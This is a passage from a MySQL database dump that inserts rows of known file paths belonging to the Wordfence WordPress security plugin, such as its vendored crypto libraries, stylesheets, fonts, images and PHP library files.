(3006, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php'),
(3007, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php'),
(3008, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php'),
(3009, 'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json'),
(3010, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE'),
(3011, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey'),
(3012, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc'),
(3013, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php'),
(3014, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php'),
(3015, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php'),
(3016, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php'),
(3017, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php'),
(3018, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php'),
(3019, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php'),
(3020, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php'),
(3021, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php'),
(3022, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php'),
(3023, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE'),
(3024, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php'),
(3025, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php'),
(3026, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php'),
(3027, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php'),
(3028, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php'),
(3029, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php'),
(3030, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php'),
(3031, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php'),
(3032, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php'),
(3033, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),
(3034, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),
(3035, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php'),
(3036, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php'),
(3037, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),
(3038, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),
(3039, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),
(3040, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),
(3041, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),
(3042, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php'),
(3043, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php'),
(3044, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php'),
(3045, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php'),
(3046, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php'),
(3047, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php'),
(3048, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php'),
(3049, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php'),
(3050, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php'),
(3051, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php'),
(3052, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php'),
(3053, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php'),
(3054, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php'),
(3055, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php'),
(3056, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php'),
(3057, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php'),
(3058, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php'),
(3059, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php'),
(3060, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),
(3061, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php'),
(3062, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php'),
(3063, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),
(3064, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),
(3065, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php'),
(3066, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),
(3067, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),
(3068, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),
(3069, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),
(3070, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),
(3071, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),
(3072, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),
(3073, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),
(3074, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),
(3075, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),
(3076, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),
(3077, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),
(3078, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),
(3079, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),
(3080, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),
(3081, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),
(3082, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),
(3083, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),
(3084, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php');
INSERT INTO `zdenl_wfknownfilelist` (`id`, `path`) VALUES
(3085, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),
(3086, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),
(3087, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),
(3088, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),
(3089, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),
(3090, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),
(3091, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),
(3092, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),
(3093, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),
(3094, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),
(3095, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),
(3096, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),
(3097, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),
(3098, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),
(3099, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),
(3100, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),
(3101, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),
(3102, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),
(3103, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),
(3104, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),
(3105, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),
(3106, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),
(3107, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),
(3108, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),
(3109, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),
(3110, 'wp-content/plugins/wordfence/css/activity-report-widget.1579191227.css'),
(3111, 'wp-content/plugins/wordfence/css/diff.1579191227.css'),
(3112, 'wp-content/plugins/wordfence/css/dt_table.1579191227.css'),
(3113, 'wp-content/plugins/wordfence/css/fullLog.1579191227.css'),
(3114, 'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),
(3115, 'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),
(3116, 'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),
(3117, 'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),
(3118, 'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),
(3119, 'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),
(3120, 'wp-content/plugins/wordfence/css/iptraf.1579191227.css'),
(3121, 'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1579191227.css'),
(3122, 'wp-content/plugins/wordfence/css/jquery-ui.min.1579191227.css'),
(3123, 'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1579191227.css'),
(3124, 'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1579191227.css'),
(3125, 'wp-content/plugins/wordfence/css/main.1579191227.css'),
(3126, 'wp-content/plugins/wordfence/css/phpinfo.1579191227.css'),
(3127, 'wp-content/plugins/wordfence/css/wf-adminbar.1579191227.css'),
(3128, 'wp-content/plugins/wordfence/css/wf-colorbox.1579191227.css'),
(3129, 'wp-content/plugins/wordfence/css/wf-font-awesome.1579191227.css'),
(3130, 'wp-content/plugins/wordfence/css/wf-global.1579191227.css'),
(3131, 'wp-content/plugins/wordfence/css/wf-ionicons.1579191227.css'),
(3132, 'wp-content/plugins/wordfence/css/wf-onboarding.1579191227.css'),
(3133, 'wp-content/plugins/wordfence/css/wf-roboto-font.1579191227.css'),
(3134, 'wp-content/plugins/wordfence/css/wfselect2.min.1579191227.css'),
(3135, 'wp-content/plugins/wordfence/css/wordfenceBox.1579191227.css'),
(3136, 'wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff'),
(3137, 'wp-content/plugins/wordfence/fonts/ionicons.woff'),
(3138, 'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff'),
(3139, 'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff'),
(3140, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff'),
(3141, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff'),
(3142, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff'),
(3143, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff'),
(3144, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff'),
(3145, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff'),
(3146, 'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff'),
(3147, 'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff'),
(3148, 'wp-content/plugins/wordfence/images/2fa-whole.svg'),
(3149, 'wp-content/plugins/wordfence/images/2fa1.svg'),
(3150, 'wp-content/plugins/wordfence/images/2fa2.svg'),
(3151, 'wp-content/plugins/wordfence/images/back_disabled.jpg'),
(3152, 'wp-content/plugins/wordfence/images/back_enabled.jpg'),
(3153, 'wp-content/plugins/wordfence/images/blocking.svg'),
(3154, 'wp-content/plugins/wordfence/images/button-grad-grey.png'),
(3155, 'wp-content/plugins/wordfence/images/checkbox.png'),
(3156, 'wp-content/plugins/wordfence/images/flags.png'),
(3157, 'wp-content/plugins/wordfence/images/forward_disabled.jpg'),
(3158, 'wp-content/plugins/wordfence/images/forward_enabled.jpg'),
(3159, 'wp-content/plugins/wordfence/images/help.png'),
(3160, 'wp-content/plugins/wordfence/images/icons/ajax24.gif'),
(3161, 'wp-content/plugins/wordfence/images/icons/ajax3.gif'),
(3162, 'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),
(3163, 'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),
(3164, 'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),
(3165, 'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),
(3166, 'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),
(3167, 'wp-content/plugins/wordfence/images/icons/email_go.png'),
(3168, 'wp-content/plugins/wordfence/images/icons/error128.png'),
(3169, 'wp-content/plugins/wordfence/images/icons/magnifier.png'),
(3170, 'wp-content/plugins/wordfence/images/icons/tick128.png'),
(3171, 'wp-content/plugins/wordfence/images/icons/warning128.png'),
(3172, 'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),
(3173, 'wp-content/plugins/wordfence/images/lightbox-controls.png'),
(3174, 'wp-content/plugins/wordfence/images/loading.gif'),
(3175, 'wp-content/plugins/wordfence/images/loading_background.png'),
(3176, 'wp-content/plugins/wordfence/images/loading_large.gif'),
(3177, 'wp-content/plugins/wordfence/images/logo.png'),
(3178, 'wp-content/plugins/wordfence/images/options.svg'),
(3179, 'wp-content/plugins/wordfence/images/ratelimiting.svg'),
(3180, 'wp-content/plugins/wordfence/images/sort_asc.gif'),
(3181, 'wp-content/plugins/wordfence/images/sort_asc.png'),
(3182, 'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),
(3183, 'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),
(3184, 'wp-content/plugins/wordfence/images/sort_both.gif'),
(3185, 'wp-content/plugins/wordfence/images/sort_both.png'),
(3186, 'wp-content/plugins/wordfence/images/sort_desc.gif'),
(3187, 'wp-content/plugins/wordfence/images/sort_desc.png'),
(3188, 'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),
(3189, 'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),
(3190, 'wp-content/plugins/wordfence/images/support.svg'),
(3191, 'wp-content/plugins/wordfence/images/tools.svg'),
(3192, 'wp-content/plugins/wordfence/images/wf-central-logo.svg'),
(3193, 'wp-content/plugins/wordfence/images/wf-horizontal.svg'),
(3194, 'wp-content/plugins/wordfence/images/wordfence-logo.svg'),
(3195, 'wp-content/plugins/wordfence/index.php'),
(3196, 'wp-content/plugins/wordfence/js/Chart.bundle.min.1579191227.js'),
(3197, 'wp-content/plugins/wordfence/js/admin.1579191227.js'),
(3198, 'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1579191227.js'),
(3199, 'wp-content/plugins/wordfence/js/admin.liveTraffic.1579191227.js'),
(3200, 'wp-content/plugins/wordfence/js/date.1579191227.js'),
(3201, 'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1579191227.js'),
(3202, 'wp-content/plugins/wordfence/js/jquery.colorbox-min.1579191227.js'),
(3203, 'wp-content/plugins/wordfence/js/jquery.colorbox.1579191227.js'),
(3204, 'wp-content/plugins/wordfence/js/jquery.dataTables.min.1579191227.js'),
(3205, 'wp-content/plugins/wordfence/js/jquery.qrcode.min.1579191227.js'),
(3206, 'wp-content/plugins/wordfence/js/jquery.tmpl.min.1579191227.js'),
(3207, 'wp-content/plugins/wordfence/js/jquery.tools.min.1579191227.js'),
(3208, 'wp-content/plugins/wordfence/js/knockout-3.3.0.1579191227.js'),
(3209, 'wp-content/plugins/wordfence/js/wfdashboard.1579191227.js'),
(3210, 'wp-content/plugins/wordfence/js/wfdropdown.1579191227.js'),
(3211, 'wp-content/plugins/wordfence/js/wfglobal.1579191227.js'),
(3212, 'wp-content/plugins/wordfence/js/wfpopover.1579191227.js'),
(3213, 'wp-content/plugins/wordfence/js/wfselect2.min.1579191227.js'),
(3214, 'wp-content/plugins/wordfence/lib/.htaccess'),
(3215, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),
(3216, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),
(3217, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),
(3218, 'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),
(3219, 'wp-content/plugins/wordfence/lib/Diff.php'),
(3220, 'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),
(3221, 'wp-content/plugins/wordfence/lib/IPTraf.php'),
(3222, 'wp-content/plugins/wordfence/lib/IPTrafList.php'),
(3223, 'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),
(3224, 'wp-content/plugins/wordfence/lib/compat.php'),
(3225, 'wp-content/plugins/wordfence/lib/conntest.php'),
(3226, 'wp-content/plugins/wordfence/lib/cronview.php'),
(3227, 'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),
(3228, 'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),
(3229, 'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),
(3230, 'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),
(3231, 'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),
(3232, 'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),
(3233, 'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),
(3234, 'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),
(3235, 'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),
(3236, 'wp-content/plugins/wordfence/lib/dashboard/widget_tdf.php'),
(3237, 'wp-content/plugins/wordfence/lib/dbview.php'),
(3238, 'wp-content/plugins/wordfence/lib/diffResult.php'),
(3239, 'wp-content/plugins/wordfence/lib/email_genericAlert.php'),
(3240, 'wp-content/plugins/wordfence/lib/email_newIssues.php'),
(3241, 'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),
(3242, 'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),
(3243, 'wp-content/plugins/wordfence/lib/flags.php'),
(3244, 'wp-content/plugins/wordfence/lib/live_activity.php'),
(3245, 'wp-content/plugins/wordfence/lib/menu_dashboard.php'),
(3246, 'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),
(3247, 'wp-content/plugins/wordfence/lib/menu_firewall.php'),
(3248, 'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),
(3249, 'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),
(3250, 'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),
(3251, 'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),
(3252, 'wp-content/plugins/wordfence/lib/menu_options.php'),
(3253, 'wp-content/plugins/wordfence/lib/menu_scanner.php'),
(3254, 'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),
(3255, 'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),
(3256, 'wp-content/plugins/wordfence/lib/menu_support.php'),
(3257, 'wp-content/plugins/wordfence/lib/menu_tools.php'),
(3258, 'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),
(3259, 'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),
(3260, 'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),
(3261, 'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),
(3262, 'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),
(3263, 'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),
(3264, 'wp-content/plugins/wordfence/lib/noc1.key'),
(3265, 'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),
(3266, 'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),
(3267, 'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),
(3268, 'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),
(3269, 'wp-content/plugins/wordfence/lib/sysinfo.php'),
(3270, 'wp-content/plugins/wordfence/lib/unknownFiles.php'),
(3271, 'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),
(3272, 'wp-content/plugins/wordfence/lib/wf503.php'),
(3273, 'wp-content/plugins/wordfence/lib/wfAPI.php'),
(3274, 'wp-content/plugins/wordfence/lib/wfActivityReport.php'),
(3275, 'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),
(3276, 'wp-content/plugins/wordfence/lib/wfAlerts.php'),
(3277, 'wp-content/plugins/wordfence/lib/wfArray.php'),
(3278, 'wp-content/plugins/wordfence/lib/wfBrowscap.php'),
(3279, 'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),
(3280, 'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),
(3281, 'wp-content/plugins/wordfence/lib/wfCache.php'),
(3282, 'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),
(3283, 'wp-content/plugins/wordfence/lib/wfConfig.php'),
(3284, 'wp-content/plugins/wordfence/lib/wfCrawl.php'),
(3285, 'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),
(3286, 'wp-content/plugins/wordfence/lib/wfCrypt.php'),
(3287, 'wp-content/plugins/wordfence/lib/wfDB.php'),
(3288, 'wp-content/plugins/wordfence/lib/wfDashboard.php'),
(3289, 'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),
(3290, 'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),
(3291, 'wp-content/plugins/wordfence/lib/wfDict.php'),
(3292, 'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),
(3293, 'wp-content/plugins/wordfence/lib/wfHelperBin.php'),
(3294, 'wp-content/plugins/wordfence/lib/wfHelperString.php'),
(3295, 'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),
(3296, 'wp-content/plugins/wordfence/lib/wfImportExportController.php'),
(3297, 'wp-content/plugins/wordfence/lib/wfIssues.php'),
(3298, 'wp-content/plugins/wordfence/lib/wfJWT.php'),
(3299, 'wp-content/plugins/wordfence/lib/wfLockedOut.php'),
(3300, 'wp-content/plugins/wordfence/lib/wfLog.php'),
(3301, 'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),
(3302, 'wp-content/plugins/wordfence/lib/wfModuleController.php'),
(3303, 'wp-content/plugins/wordfence/lib/wfNotification.php'),
(3304, 'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),
(3305, 'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),
(3306, 'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),
(3307, 'wp-content/plugins/wordfence/lib/wfScan.php'),
(3308, 'wp-content/plugins/wordfence/lib/wfScanEngine.php'),
(3309, 'wp-content/plugins/wordfence/lib/wfSchema.php'),
(3310, 'wp-content/plugins/wordfence/lib/wfStyle.php'),
(3311, 'wp-content/plugins/wordfence/lib/wfSupportController.php'),
(3312, 'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),
(3313, 'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),
(3314, 'wp-content/plugins/wordfence/lib/wfUtils.php'),
(3315, 'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),
(3316, 'wp-content/plugins/wordfence/lib/wfView.php'),
(3317, 'wp-content/plugins/wordfence/lib/wfViewResult.php'),
(3318, 'wp-content/plugins/wordfence/lib/wordfenceClass.php'),
(3319, 'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),
(3320, 'wp-content/plugins/wordfence/lib/wordfenceHash.php'),
(3321, 'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),
(3322, 'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),
(3323, 'wp-content/plugins/wordfence/models/.htaccess'),
(3324, 'wp-content/plugins/wordfence/models/block/wfBlock.php'),
(3325, 'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),
(3326, 'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),
(3327, 'wp-content/plugins/wordfence/models/common/wfTab.php'),
(3328, 'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),
(3329, 'wp-content/plugins/wordfence/models/page/wfPage.php'),
(3330, 'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),
(3331, 'wp-content/plugins/wordfence/modules/login-security/classes/.htaccess'),
(3332, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),
(3333, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),
(3334, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),
(3335, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),
(3336, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),
(3337, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),
(3338, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),
(3339, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),
(3340, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),
(3341, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),
(3342, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),
(3343, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),
(3344, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),
(3345, 'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),
(3346, 'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),
(3347, 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),
(3348, 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),
(3349, 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),
(3350, 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),
(3351, 'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),
